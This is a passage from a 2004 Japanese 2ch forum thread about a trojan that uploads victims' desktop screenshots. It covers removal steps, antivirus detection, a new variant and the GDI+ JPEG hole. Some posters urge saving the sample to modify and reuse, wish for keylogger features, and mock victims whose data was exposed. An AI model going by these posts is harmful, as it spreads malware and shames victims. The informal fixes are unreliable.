んー、でもよく考えると俺が間違ってるな。MSのGDI+の事も書けばよかった。 796 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:37:27 ID:xduUn+v/] 今回のに限っていえば、晒されてるjpegは今のとこ無害だからな。 便乗してアプロに仕込むやつもいそうだが 797 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:41:34 ID:xduUn+v/] つーか、GDI+対策しないで、今頃jpeg開く香具師が悪いと思われ パッチがあがった時点から危険度急上昇だぞ 798 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:42:55 ID:EMRLV6EZ] jpgで感染！？(ﾟдﾟ)すんのかよ！？ 799 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:45:36 ID:LvJ+JBBu] >>798 するよ〜、jpg見るどころか、うｐロダ逝ったら即感染ですよ 怖いよ〜ウィルスわ 800 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:52:21 ID:ky5A4Ls4] まあ、SP2な俺には関係ないが 801 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:54:42 ID:iqYKdWhe] >>798 まだしてないなら、すぐWindowsUpdataした方がいいよ。 って、「重要なパッチは、もうすでに当ててるだろ？」って認識で話するのは、やっぱり やめた方がよさそうだな。そこが間違ってた。それに今後も新しく判明した画像処理の 脆弱性をついたウィルスが、現れない保証もない。これからは画像も油断できないと 言う事か。 802 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:55:44 ID:jZRbqOye] >>801 SP2を入れると不具合出そうで恐いよ〜。 803 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:56:54 ID:ky5A4Ls4] ttp://www.openwall.com/advisories/OW-002-netscape-jpeg/crash/ とりあえずテストページ。ここの"I am ready to die."を踏んでクラッシュしたら SP2を当てるかWindowsUpdateしないと危険。ちなみにﾉｰﾄｿが反応するから、 ウイルス対策ソフト入れてる人は安心してもいいかもしれない 804 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:07:06 ID:EMRLV6EZ] ２ｃｈブラウザのjpg垣間見機能でもだめか？ 805 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:12:11 ID:jZxILG0u] >766 LANケーブル抜いてネット切断、それで首吊れ 806 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:12:12 ID:zW53Q5jb] 苺きんたま対策(仮) www.geocities.jp/ichigo_kintama/ まとめサイトできたようだ 807 名前：[名無し]さん(bin+cue).rar [04/09/23 11:14:52 ID:2DsdDYOp] >>469 ダウンロードできないんだけど、もう削除されたかな？ 808 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:22:10 ID:PFKtStB6] >>766 再起動してタスクマネージャー開いてプロセス見ろ。 それでshellsystem.exeを終了させろ。 これで動作は速くなる。 あとはレジストリでshellsystem.exeを削除すれば終了 809 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:24:03 ID:sH8yfJe2] マルチプロセスだからタスクマネージャからは消せんぞ。 810 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:27:07 ID:PFKtStB6] >>809 遊びで感染したんだが、再起動させたら俺は消せた。 なんでかはわからん 811 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:31:26 ID:cDvdfQLH] 112 名前：eatkyo287016.adsl.ppp.infoweb.ne.jp＠Share使用中 ◆i.ESDXOLYY [] 投稿日：04/09/23 10:43:42 ID:La2FDeZx {Now!}俺のクリップボード(50byte 10行抜粋版, 何もコピーしてません) 〜何も無いので環境変数晒し〜 コンピュータ名: VIP ユーザー名: takehiro ﾜﾛﾀ 812 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:35:25 ID:2aG10cCS] 俺どうせ割れ窓だから笑えるユーザー名でわざと踏んで晒してみるか ほりえもんとか毎日新聞で凶悪ぺド画像とか 813 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:43:24 ID:IQ9BvSXd] しまった、祭りに乗り遅れた。 nyか洒落にあがってないかな(w 814 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:45:03 ID:tyH5EMtg] >>813 京都府警にしてよ 815 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:46:19 ID:k8gkpGNZ] このトロイの動作解説ページってまだないかな。 なんかおもしろそうだから感染させてみたいんだが。 816 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:46:30 ID:IqZ2HObi] × しまった、祭りに乗り遅れた。 ○ うお 　　完璧乗り遅れた 817 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:49:27 ID:k8gkpGNZ] Winnyを立ち上げてない限り，被害はないんだろ？ 何で祭りになってんだ？？ 818 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:51:17 ID:cDvdfQLH] 初級ネットワーク板ローカルルール申請 qb5.2ch.net/test/read.cgi/operate/1095695740/ Share10_a56 + [9月21日付]ノードリストの文字列が多い・・・あやしいな 819 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:56:30 ID:J5HdIDac] 「Share10_a56 + [9月21日付]ノードリスト」ってファイルにウィルス入ってるんだろうな 820 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:57:37 ID:pr4shzQV] >>817 ｎｙは関係ない 821 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:59:51 ID:lSmv7nYn] ファイル名変えて、あちこちに貼られてら。 822 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:00:20 ID:xCg9vDsC] なんか、もれのデスクトップ画像が２ｃｈアプロと言う どこかにアップされているらしいです。 それを見て自分を笑いたいのですが、どこにあるか 分かりますでしょうか。 823 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:00:37 ID:RdY8SqQw] 俺はVirtual PC上のWinMEでny実行してるから、晒されても問題ないな。 しかもホストOSはOS Xだし 824 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:02:37 ID:cDvdfQLH] Share10_a56 + [9月21日付]ノードリスト 18禁無修正ガンダム画像映画動画一般コミックエロゲ PS2PV巨乳アニメゲーム一般ゲームサントラアルバムMAD無修正アプリ写真集DVD.zip 1,219,360 13deb3c8b87346cd5b1a9de9029c855fc7b6128e これか 825 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:08:21 ID:NktT5qfN] 7-zip反則だな。これなら1/3近くにもなるわけだ。 7-Zip (A) 3.12 Copyright (c) 1999-2003 Igor Pavlov 2003-12-10 Listing archive: F:\DESKTOP\キンタ~1.7Z Date Time Attr Size Compressed Name ------------------- ----- ------------ ------------ ------------ 2004-09-22 15:57:10 ....A 677376 319288 (写真集) (ロリータ) 水原友里.exe 2004-09-22 15:57:10 ....A 677376 0　　 (写真集) (ロリータ) 相田香奈子.exe 2004-09-22 15:57:10 ....A 677376 0　　コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe ------------------- ----- ------------ ------------ ------------ 2032128 319288 3 files キンタ~1 7Z 319,524 04-09-23 12:58 キンタマ詰合.up1360.7z キンタ~1 BZA 1,003,287 04-09-23 13:00 キンタマ詰合.up1360.bza キンタ~1 CAB 1,032,957 04-09-23 13:00 キンタマ詰合.up1360.cab キンタ~1 YZ1 1,055,366 04-09-23 12:58 キンタマ詰合.up1360.yz1 キンタ~1 ZIP 1,033,786 04-09-22 21:25 キンタマ詰合.up1360.zip 826 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:09:25 ID:cDvdfQLH] ナニソレ 827 名前：[名無し]さん(bin+cue).rar [04/09/23 13:14:14 ID:EKR+VzAM] これってjpgのリンク踏んだだけで感染するんですか 828 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:17:14 ID:cDvdfQLH] ｎo 829 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:29:10 ID:JTze3qp6] SSの機能を無効にする方法って無いの？ 830 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:30:03 ID:H4H6HXnY] 新種のキンタマが開発されたと聞いて飛んできました ノートン先生がスルー・・・？　ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ 831 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:32:02 ID:joit0XmS] ファイル踏んだ覚えないのにshellsystem.exeがレジストリにあった場合は 感染してるんでしょうか プロセスなどにはshellsystem.exeはありませんでした 832 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:34:53 ID:Y12C9VC7] >>831 どうせ検索の履歴だろ 833 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:35:15 ID:H4H6HXnY] >>831 削除するに越した事は無いんじゃないですか？ 834 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:39:50 ID:joit0XmS] Microsoft\search Assiant\ACMru\5603の位置にあったので検索履歴みたいです ありがとうございました 835 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 14:25:04 ID:ungvXIMz] test 836 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 14:58:32 ID:xduUn+v/] >>825 その実験は興味深いな、7zなら重複ファイル簡単に探せるね。 CRCを見てて、同じだったらファイル名だけ残して捨てるんだな つか、一見、普通のファイル集合体のようで、展開したら むちゃくちゃ容量食う圧縮爆弾を簡単に作れるじゃねーか。怖。 ちなみにrarだと800KBぐらい 837 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:02:36 ID:mmGHQUsE] exe ファイル　捨てたい 838 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:08:30 ID:jZRbqOye] 苺きんたまきんたま www.geocities.jp/ichigo_kintama/ これを。 839 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:25:44 ID:UZ3hgOe/] >>837 602 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:03:45 ID:mmGHQUsE 俺は正直このくらいでいい。 観てるほうは面白いし晒された方はちょっと恥ずかしいけど そんなにダメージでかくない。あとは画像が見れれば最強なんだが。 610 名前：[名無し]さん(bin+cue).rar[] 投稿日：04/09/23(木) 00:09:58 ID:mmGHQUsE >>604 作者は力入れるとこ間違ってる気がする。 629 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:29:36 ID:mmGHQUsE おいおまいら関祭りには参加しなかったのか？ 634 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:35:59 ID:mmGHQUsE tesu 840 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:26:49 ID:UZ3hgOe/] 637 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:39:46 ID:mmGHQUsE てす 639 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:42:44 ID:mmGHQUsE ニュー速で規制されたorz ９０秒ってなげーよ・・・ 662 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 01:10:41 ID:mmGHQUsE しかし久々にflashget使ったよｗ 668 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 01:35:42 ID:mmGHQUsE もううｐはやんだの？ 679 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 02:47:44 ID:mmGHQUsE あ〜面白かった。三日分は笑ったな。 837 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 15:02:36 ID:mmGHQUsE exe ファイル　捨てたい 841 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:00:42 ID:gRp4IpXR] なになに？笑って見てたら笑えない状況になったのかID:mmGHQUsEは？ 842 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:06:35 ID:QGmLVuGv] txtなどのアイコンの変更はどうやるのでしょうか？ 843 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:18:48 ID:qaAkrrtW] >>840 837で爆笑 844 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:22:49 ID:L1ZU8rVo] >841 ﾄﾞｿﾞｰ that3.2ch.net/test/read.cgi/gline/1095873352/l50 845 名前：627 mailto:sage [04/09/23 16:24:41 ID:Q+leSqll] ノートン先生から解析結果が届いたのでコピペします。 ------------------------------------------------------------------- Subject:[CLOSING]: Symantec Security Response Automation:Tracking No. ******** 日付: 22-09-2004 (個人情報に付き削除) 様 ファイルを分析しました。送られたそれぞれのファイルについてわかったことを 以下に報告します。 ファイル名: Q:\2ch\(写真集) (ロリータ) 水原友里.exe コンピュータ: (個人情報に付き削除) 結果: このファイルは次のウィルスに感染しています: Trojan.Upchan デベロッパーノート : Q:\2ch\(写真集) (ロリータ) 水原友里.exe is non-repairable threat. NAV with the latest rapidrelease definition detects this. Please delete this file and replace it if neccessary. Please follow the instruction at the end of this email message to install the latest rapidrelease definitions. ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。 今回の提出されたサンプルに含まれる脅威に個別対応した定義ファイルを作成いたしましたので、 このメールの末尾に書かれた手順にしたがってインストールしてください。 個別対応版定義ファイルのインストール方法： 1. 添付された定義ファイルの更新版を保存します。 2. 保存したファイルをダブルクリックし、画面の指示に従って操作します。 ------------------------------------------------------------------- 846 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:26:59 ID:t4uJAFpV] >>845 Upchanって・・・。それにしても対応早いな。 バスターまだ〜（AA略） 847 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:28:51 ID:Pi3bt/OK] >保存したファイルをダブルクリックし、画面の指示に従って操作します。 ICHIGOｳｲﾙｰｽに感染した香具師はﾄﾗｳﾏに… 848 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:30:52 ID:62NRg8JO] >>845 おぉ先生きたか 　　　　 >Trojan.Upchan 　あっぷちゃん、もしくはうぷちゃん　 　　　　苺キンタマは却下かｗ 849 名前：627 mailto:sage [04/09/23 16:33:37 ID:Q+leSqll] 添付されていた定義パッチで (写真集) (ロリータ) 水原友里.exe (写真集) (ロリータ) 相田香奈子.exe コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe を「Trojan.Upchan」として検出できることを確認。 というわけで一般向けには次回定義更新時の定義でサポートされると思われ。 >>846 バスターの検体提出方法は不明だが ノートン先生見たく検疫ソフトで送信できるなら誰か持ってる奴が送信した方がはやいよ。 850 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:41:53 ID:soiSa9lC] 35 名前：水先案名無い人[sage] 投稿日：04/09/23 02:23:45 ID:ccAq4UYb 簡単な説明 とある人物がうｐロダにうｐられているexeを実行 そのexeはキンタマウィルスと同じようなデスクトップ画像を晒されるウィルス入り このウィルスは8分置きに2chうｐロダにデスクトップ画像をうｐられ角煮のアップローダスレに自動で書き込まれる そしてこのウィルスにかかっている事を知った当の本人は必死になって削除方法検索 その時の検索ワードが「exe ファイル 捨てたい」 この検索結果の画像を上記に書かれているウィルスによって自動でスレに書き込まれスレ住人を爆笑の渦へ おわり ↑わるいがﾜﾛﾀ 851 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:45:57 ID:cDvdfQLH] 俺でさえも（ｒｙ　は対策しないんだなｗ 852 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:52:19 ID:pr4shzQV] バスター更新ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!! けど、対応してるのかな 853 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:53:18 ID:mva2OVxj] >>852 人柱 854 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:16:25 ID:/+AT9169] で、対応はどうなんだ？ 漏れバスター無いから確かめられんのよね… 855 名前：627 mailto:sage [04/09/23 17:24:35 ID:Q+leSqll] とりあえず定義パッチ。 ttp://rupan.zive.net/~kain/cgi-bin/upload/src/up0555.zip Pass:NAV32 Name MD5 Bytes ---------- -------------------------------- ---------- apache.zip C12EB402A934A29D4DC44FEAD7BD1964 5,353,391 ------------------------------------------------------- Total 1 Files 5,353,391 Bytes Name MD5 Bytes ----------- -------------------------------- --------- updat32.exe FFA6D54E96FB2E825A0ADD93C93D689E 5,502,200 -------------------------------------------------------- Total 1 Files 5,502,200 Bytes 856 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:34:08 ID:Q+leSqll] >>852 ノートン先生はこの騒ぎのあとに定義更新があったけど未対応だった… #確認するにもブツを持ってないとできないしな 857 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:37:40 ID:Pi3bt/OK] >>856 きました 858 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:44:31 ID:t4uJAFpV] >>852 パターンみたけどUpchanみたいに判りやすい名前は無かったな。 多分、未対応だと思う。 859 名前：test ◆NJ8QhBoOZU mailto:sage [04/09/23 17:44:38 ID:VAVDavsr] test 860 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:46:46 ID:qaAkrrtW] 「exe ファイル 捨てたい」 (・∀・)ｲｲ!!ﾜﾗﾀﾜﾗﾀ 861 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 17:51:20 ID:xduUn+v/] >>856 テストマシンに定義パッチ当てた。飼ってる苺キンタマは見事にヒット （はじめrarの中に入れておいたからヒットしなかったよ） Upchanの詳細情報まではなし。Up 2ch/苺ch という意味か… 862 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:04:49 ID:u+ulJzWX] that3.2ch.net/test/read.cgi/gline/1030921732/572 863 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:06:11 ID:AH6SroMo] Trojan.ichigokintama Trojan.berryballs 864 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:30:39 ID:GPZkaXV9] ttp://picopico.dip.jp/ragnarok/data/1/1095925509796_AreTool25.zip これのragnarok\config.txt・・・.exeにひっかかりました。 ダブルクリックした瞬間にひっかかったと気づいたので急いで回線を抜きました。 亜種でしょうか？プロセスを見てもD:\WINDOWS\shellsystem.exeとは出ませんでした。（D:\にOSを入れてます） かわりにD:\WINDOWS\sugoimonoss.comというコマンドプロンプトのファイルが生成されました。 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sugoimonoss.com を レジストリからも消しました。 とりあえず削除してPCを落としました。 セーフモードで起動したらsugoimonoss.comが復活していたので削除しました。上の元ファイルも削除しました。 レジストリを確認してみると同じ場所にはありませんでした。 そして再起動したらsugoimonoss.comは復活してなかったのでもう平気でしょうか？ いまはサブパソコンから書き込みしています。 865 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:38:07 ID:IFT2b9V5] >>864 みんな超能力者じゃないから断言できないけどたぶん大丈夫。 866 名前：627 mailto:sage [04/09/23 18:41:45 ID:Q+leSqll] >>852 バスターは持ってないのでトレンドマイクロの オンラインスキャンを利用してスキャンしてみたが未検出でしたので未対応のようです。 なのでバスター使いの誰かが提出するか トレンドマイクロの中の人が気づくまで対応されないと思われます。 #提出しようと思ったが #なんか製品登録したやつしか提出できない感じ… 867 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:47:10 ID:mva2OVxj] Share(仮称) ウイルス情報 tmp4.2ch.net/test/read.cgi/download/1095907115/ 868 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:48:59 ID:HP1mtfoW] >>866 ウイルス情報は各社が共有する紳士協定みたいなのがあるから バスターも対応すると思われ 869 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:54:10 ID:rPkWk6Jz] 最初の被害者で晒しまくった挙句、角煮にも降臨したのが ユーザー名 YUSUKE という香具師だった そこで、ﾁｬﾈﾗの間では、このｳｲﾙｽをYUSUKEｷﾝﾀﾏﾘｱと名付ける動きがあった 870 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:54:42 ID:7p6CJmmF] >>866 バスターには昨日夜提出しておいたが、流石に一日じゃ解析からパターンファイル作成まで行かないみたいだな・・・ 868の言うとおり、もう少し待てば対応するはず・・・ 871 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:56:07 ID:+Y3dTfL1] えーと、苺ｷﾝﾀﾏってローカルネットワーク対応？ ぶっちゃけ言うと1台に感染したらLAN接続してる別PCにも勝手に伝播しますか？ 872 名前：ﾊﾞｽﾀｰ使い mailto:sage [04/09/23 18:56:44 ID:rQ28x1D5] >>870 提出乙！ 873 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 18:58:13 ID:JaZKld0M] ｼﾞｭﾌﾞﾅｲﾙのﾕｰｽｹ!を思い出す 874 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:09:20 ID:GPZkaXV9] >>864 これって新種？ 875 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:12:44 ID:xduUn+v/] >>864 落ちてこないよ。解析したいのに。 876 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:20:25 ID:xduUn+v/] >>864 で、見てみた。 苺キンタマと中身はそっくり、ただし、>>855のノートン先生の定義パッチでは無反応 新種というか亜種 確定。 やはり、類似品を簡単に作れるような設計になってるみたいだな。 こりゃ、しばらく祭り継続だな 877 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:23:59 ID:T4ToCva4] >>876 うp先はどこなん？ 878 名前：[名無し]さん(bin+cue).rar [04/09/23 19:31:53 ID:LXjx4AWF] シマンテック　ウイルス感染の疑いがあるファイルを Symantec Security Response に提出する方法 service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949 879 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:33:26 ID:/oIKzfHB] 亜種にはfusiana機能も付けてほしい あとwebカメラ設置者はそっちが起動されるとかね〜 　 880 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:34:29 ID:62NRg8JO] 休みが明けて電源を入れたら壮大な祭りになる悪寒… 公的機関、企業の内部情報…個人情報と個人の性癖はもう晒されてるし ど素人は原種がAVで引っかかっても、亜種には対応してないから安心しそうだ まだまだ祭りは終わらないねこりゃ… 881 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:40:09 ID:GPZkaXV9] >>876 再起動したら自動でsugoimonoss.comが起動して感染する仕組みだったのでしょうか？ それともそれ単体で動作するのですか？ 踏んだ直後にプロセスを見ても何もありませんでした。 レジストリのRun\のなかにsugoimonoss.comがあったので気づいたのですが・・・。 882 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:40:27 ID:+moW+9Lf] 亜種はノートン反応無しとは 楽しい日々はまだまだ続くかな？ 883 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:40:40 ID:dlC1dSfw] すごいことになりそうだな… 884 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:40:45 ID:RzyOzwfF] >>881 うっせラグナロクのチーターは死ねよｗｗ 885 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:42:44 ID:GPZkaXV9] ラグナロク知ってる人しかわからないレスごめんなさい >>884 あのあぷろだには普段はチートツールはうｐされないから多分罠ツールだと思って落としてみて、config開いたらウィルスだった。 罠ツールを集めるのが趣味なんです。 886 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:44:42 ID:bDi76u+h] これは早めに次スレがいるね。 887 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:44:59 ID:LvJ+JBBu] >>864 亜種ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!! つーか、当然そうなる罠 888 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:48:49 ID:RzyOzwfF] 亜種保管しておこうぜ いろいろ使えそう 889 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:51:55 ID:mgVunU57] 亜種はいずれ対応されてしまう。 それよりオリジナルを確保しておいて自分で適宜改良して使うが吉。 で、だれか新型に感染してみたか？ 節穴機能は追加されたんだろうか…… 890 名前：：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:52:34 ID:pNUKkC8s] ウィルスバスターかけていたらwindowsやシステム32のほとんどが dllやexeなんですがこれっておかしいのでしょうか？ 891 名前：[名無し]さん(bin+cue).rar [04/09/23 19:53:31 ID:h0nUPIzO] てかなんでお前らウィルス肯定してんだ 対策しないと２ｃｈが訴えられてまた閉鎖騒ぎになるってのに 892 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:54:58 ID:wZ9Gu9IX] 本当に 893 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:55:07 ID:bL7m252I] ほむ、2chが閉鎖となると大変なことになってしまいますね・・・ なんとか対策をたてましょう 894 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:55:09 ID:VuLxnNRm] >>890 パソコン雑誌 買いなさい！必ず買いなさい！ 895 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:55:33 ID:l0b9RDPZ] キーロガーとか、kakikomi.txtうp機能とか どんどん機能拡張していって欲しい 896 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:56:14 ID:r7vcxVQ0] きんたま感染したぽ・・ >>855はＤＬできないしレジストリで消しても復活するし・・ 897 名前：[名無し]さん(bin+cue).rar [04/09/23 19:59:02 ID:h0nUPIzO] 別スレにも書いたんだけど 96 ：名無したん(;´Д｀)ﾊｧﾊｧ ：04/09/23 19:56:41 ID:11SxMVKb >>91 ・２ｃｈうｐろだにうｐされてるあたり２ｃｈ閲覧者の犯行 ・２ｃｈねらーが個人情報画像わざわざ晒しあげしてやがる ・これまですべての板内のトラブルはひろゆきへ損害賠償 ・今回の場合被害者の数が今までと比較にならない 898 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:00:12 ID:CHjM5zzS] >>896 いちごきんたまなら>>604 899 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:01:29 ID:r7vcxVQ0] セーフモードってなんですか？・・ お願いします。 900 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:02:18 ID:0IaPSUs5] >>899 検索もできませんか 901 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:02:42 ID:JKMNRGue] >>899 いいから、寝ろ。 902 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:02:59 ID:xdINSUdZ] >>899 おまえはググる事も出来ないのか? 903 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:04:17 ID:C3nZ381I] >>899 死ね 904 名前：[名無し]さん(bin+cue).rar [04/09/23 20:04:24 ID:h0nUPIzO] 3人で叩きｹｺｰﾝとは悲惨な 905 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:04:27 ID:FmEEJd2e] 質問してるヤシは感染者か？ 906 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:05:45 ID:U1wYwujU] 記念としてとっておきたい、元ファイルくれませんか? 907 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:05:51 ID:OB9dwy0R] >>899 くだらない事言ってないで早く働けよ 908 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:06:48 ID:r7vcxVQ0] 感染者です。 ttp://higaitaisaku.web.infoseek.co.jp/safemode.html msconfigと検索しても出てきません・・ 重いからなのでしょうか？ 909 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:07:24 ID:l0b9RDPZ] なんとなくだがキンタマウイルス作成者も 2chをフシアナトラップで荒らした香具師も同一人物のような気がするぞ 910 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:12:28 ID:mgVunU57] 2ch閉鎖騒動が起こるならそれもまたよし。 次はどこへいくか、誰がやるか、という問題提起になるからな。 ……ならないか。 911 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:13:07 ID:PDZ9NpvK] 今回の件で２ｃｈやひろゆきになんか責任発生するか？ 912 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:13:23 ID:yaHp/7Av] この間発覚した多くの○○○の脆弱性と組み合わされたら、恐ろしいことになる悪寒。 ○○○→須磨祖。マジで悪用されたらまずいだろうから。（見当は付くよな） 913 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:13:51 ID:C3nZ381I] >>908 基本中の基本すら学習しない状態でnyなんかに手を出した事を悔やむこったな。 自業自得だっての。 914 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:15:51 ID:Eei9QNEZ] >>911 しないよ 915 名前：837 mailto:sage [04/09/23 20:21:06 ID:mmGHQUsE] 亀レスだけどさぁ。別に俺は感染してないから。 ただヤフー検索でexe　ファイル　捨てたいって 検索してるｓｓがうｐされてて面白かったから書き込んだだけ。 916 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:22:32 ID:qaAkrrtW] >>915 わーってるよ 917 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:22:56 ID:KYU7HFHZ] このスレ見てるね v.isp.2ch.net/up/c50185416f55.jpg 918 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:24:02 ID:mgVunU57] 今後次第だろ。 今ぐらいの規模ならともかく、大流行とかﾔﾊﾞｲものが晒されたりとかしたらどうなるかわからん。 例えば某○○○○犯罪対策室から感染者が出ちゃうとかな。 無理を通せば道理が引っ込むのはｵﾏｲﾗも知ってのとおり。 919 名前：[名無し]さん(bin+cue).rar [04/09/23 20:24:55 ID:h0nUPIzO] 個人メルアドとかヤフオクＩＤとパスとか流出してるのはどうなのよ 920 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:24:56 ID:3F3YfAd9] >>908 それだけではどういう状況かサッパリ他人には伝わらないだろう 自分がどういう環境を持っていて、どういうものに感染して 